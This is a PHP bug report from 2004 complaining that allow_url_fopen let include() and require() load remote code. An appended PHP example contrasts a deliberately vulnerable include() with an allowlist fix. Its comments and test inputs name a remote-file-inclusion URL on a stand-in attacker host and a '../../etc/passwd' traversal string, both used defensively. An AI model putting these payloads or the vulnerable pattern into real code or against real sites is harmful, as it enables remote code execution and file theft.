Request #28684 allow_url_fopen drops security down
Submitted: 2004-06-07 22:43 UTC Modified: 2012-04-09 22:12 UTC
Votes:5
Avg. Score:5.0 ± 0.0
Reproduced:4 of 4 (100.0%)
Same Version:1 (25.0%)
Same OS:2 (50.0%)
From: php at koteroff dot ru Assigned: nikic
Status: Closed Package: *General Issues
PHP Version: 4.3.6 OS: *
Private report: No CVE-ID: None
 [2004-06-07 22:43 UTC] php at koteroff dot ru
Description:
------------
First, we have documentation problem:
http://php.net/ini-set
allow_url_fopen "1" PHP_INI_ALL 
Not PHP_INI_ALL, but PHP_INI_SYSTEM (according to my experiments and CHANGELOG).
(But it was described here: http://bugs.php.net/bug.php?id=28497&edit=2 ).

Second, in the new version of PHP allow_url_fopen affects include() and require() too. It's terrible! The security of scripts falls down! And (thanks to PHP_INI_SYSTEM) we cannot switch off allow_url_fopen for individual sites, only for the whole server globally.

I have a proposal: add a directive that enables the use of fopen wrappers in the include() functions. This directive should be SEPARATE from allow_url_fopen, and it should be possible to switch it off not only in php.ini. Or just allow allow_url_fopen to be switched off from anywhere (but not switched on, only off).

(Personally I think it was a bad idea to add fopen wrapper support to the include functions at all, but what is done is done.)

Thanks.


 [2004-06-23 03:01 UTC] no at email dot zz
I wish allow_url_fopen could be disabled by default, and then third-party scripts that actually need the functionality would be able to enable it with an allow_url_fopen(TRUE); call or something. Many scripts use include() and require() that should never be using remote URLs.

The global 'on' or 'off' setting is way too permissive and doesn't make securing PHP very easy.
 [2006-07-10 22:08 UTC] tim at e2-media dot co dot nz
require() working on remote files by default is single-handedly responsible for a significant chunk of security holes in PHP apps. I definitely agree that require/include should be treated very differently from file_get_contents and other functions using wrappers - evaluating code is dangerous.
 [2012-04-09 22:12 UTC] nikic@php.net
-Status: Open +Status: Closed -Package: Feature/Change Request +Package: *General Issues -Assigned To: +Assigned To: nikic
 [2012-04-09 22:12 UTC] nikic@php.net
Closing this as this was already fixed long ago (with allow_url_include).
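The following is an added example, not code from the bug report or from PHP itself. It puts the pattern the reporter and tim warn about (a request parameter passed straight to include()) next to a hardened allowlist version, and shows the separation nikic refers to: since PHP 5.2 include/require are governed by allow_url_include (default Off) while file_get_contents() and friends remain governed by allow_url_fopen. Both directives are PHP_INI_SYSTEM, so ini_set() on them returns false, which is what the report observed. The page names (home, about), file paths, and the attacker URL are constructed for illustration.

```php
<?php
// Added example (not from the bug report). Run with php-cli.
declare(strict_types=1);

// php.ini (system level; cannot be overridden from a script):
//   allow_url_fopen   = On   ; file_get_contents('http://...') still works
//   allow_url_include = Off  ; include/require refuse URL wrappers (default since 5.2)

// --- The pattern the report warns about -----------------------------------
// A "page" parameter fed straight to include(). With URL wrappers allowed for
// include (allow_url_include=On; before 5.2, allow_url_fopen=On was enough),
// ?page=http://attacker.example/shell.txt fetches and executes remote code.
function vulnerable_include(string $page): void
{
    include $page; // remote file inclusion when URL wrappers reach include()
}

// --- Hardened version -----------------------------------------------------
// Map the user-supplied name onto a fixed set of local files and never hand
// the raw value to include(). This closes RFI and path traversal regardless
// of how allow_url_include is configured.
const PAGES = [
    'home'  => 'pages/home.php',   // constructed paths
    'about' => 'pages/about.php',
];

function resolve_page(string $page, array $allowed = PAGES): ?string
{
    return $allowed[$page] ?? null; // unknown names resolve to null
}

function safe_include(string $page): bool
{
    $file = resolve_page($page);
    if ($file === null) {
        return false; // reject rather than include anything attacker-shaped
    }
    include __DIR__ . '/' . $file;
    return true;
}

// --- Configuration check --------------------------------------------------
// Both directives are PHP_INI_SYSTEM: php.ini or the web server config only.
// ini_set() returns false for them, so a per-site override from code is not
// possible, exactly the limitation the original report complains about.
function url_include_status(): array
{
    return [
        'allow_url_fopen'   => (bool) ini_get('allow_url_fopen'),
        'allow_url_include' => (bool) ini_get('allow_url_include'),
        'ini_set_effective' => ini_set('allow_url_include', '0') !== false,
    ];
}

if (PHP_SAPI === 'cli') {
    var_dump(url_include_status());
    // Constructed inputs: one legitimate page name, one RFI attempt, one traversal.
    foreach (['home', 'http://attacker.example/shell.txt', '../../etc/passwd'] as $p) {
        printf("%-40s -> %s\n", $p, resolve_page($p) ?? 'rejected');
    }
}
```

The allowlist is the part that matters: allow_url_include=Off stops remote inclusion, but it does nothing against local file inclusion through the same unchecked parameter, so the directive is defence in depth rather than a fix for code that passes user input to include().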
 
PHP Copyright © 2001-2019 The PHP Group
All rights reserved.
Last updated: Mon Oct 14 20:01:26 2019 UTC